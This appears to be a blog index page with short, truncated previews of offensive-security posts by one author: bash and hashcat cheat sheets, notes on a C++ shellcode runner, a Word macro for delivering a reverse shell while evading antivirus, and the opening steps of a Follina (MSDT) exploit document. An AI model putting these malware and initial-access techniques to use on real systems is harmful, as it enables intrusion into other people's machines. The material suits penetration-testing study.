Bash Script Cheat Sheet

Hello REDTM #!/usr/bin/bash #This is Comment echo "Hello REDTM" printf "Hello REDTM" Save as hello.sh , give it execute permission chmod +x hello.sh and run ./hello.sh Parameters #!/usr/bin/bash #This is Comment echo -e "Hello $1" printf "Hey, how is it goin $1?" echo "" $1 is the first parameters, second parameters should be $2 and so on. Variables Variables used to store data to use in future by referencing to the variable name!...

4 min · Jobyer Ahmed

Custom Malware in C++

This is not a tutorial guide or course. I have wrote this as my note. But you can also utilize my idea if you have basic understanding of C++ and windows API. Understanding 5 WIN API What is the idea to execute our shellcode? Allocate Memory space as RW to store our shellcode Copy our shellcode to that memory Make the memory as executable. Run the payload. Wait to exit VirtualAlloc This function allocate memory space....

2 min · Jobyer Ahmed

Hashcat Cheat Sheet

As a penetration tester we can’t ignore hash cracking if we even can do pass-the-hash. Hash cracking could be one of the last resort if nothing work. Hashcat is the most popular and fastest program to crack password hash. I have included most common technique that can be used in hashcat to crack password hash. Installation apt install cmake build-essential -y apt install checkinstall git -y git clone https://github.com/hashcat/hashcat.git make && make install Performance on nVidia 3080 Ti Performance check for all supported hash:...

6 min · Jobyer Ahmed

Microsoft Word Macro Payload

Delivering reverse shell payload via the office macro is old but still works if you can bypass AV. Get your code ready Start Microsoft Office 2016 Pro Plus and Go View Tab and Click Macros>View Macros Give a macro name, Select Macros in Document1 and Click Create Paste the below code and save as Word Macro-Enabled Document or Word 97-2003 Document Sub TestMacro() ' ' TestMacro Macro ' ' cmd = "calc....

1 min · Jobyer Ahmed

MSDT-Follina Exploit for Initial Access

A new Remote Code Execution vulnerability for Microsoft Windows Support Diagnostic Tool(MSDT) which can be exploited using Microsoft Office Word(2013-2021). Developing the exploit Step 1 Create a docx file in your Microsoft Office Word Step 2: Edit Using 7z zip Step 3 Go to word\_rels\document.xml.rels , right click>edit The content should be exactly like: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas....

3 min · Jobyer Ahmed